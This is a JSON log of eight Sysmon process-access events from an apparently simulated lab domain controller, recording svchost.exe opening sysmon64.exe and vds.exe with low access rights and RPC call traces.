{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1329,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1330,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010E2FD0200}\r\nTargetProcessId: 3520\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010E2FD0200}","TargetProcessId":"3520","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1331,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1332,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1333,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1334,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1335,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1336,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
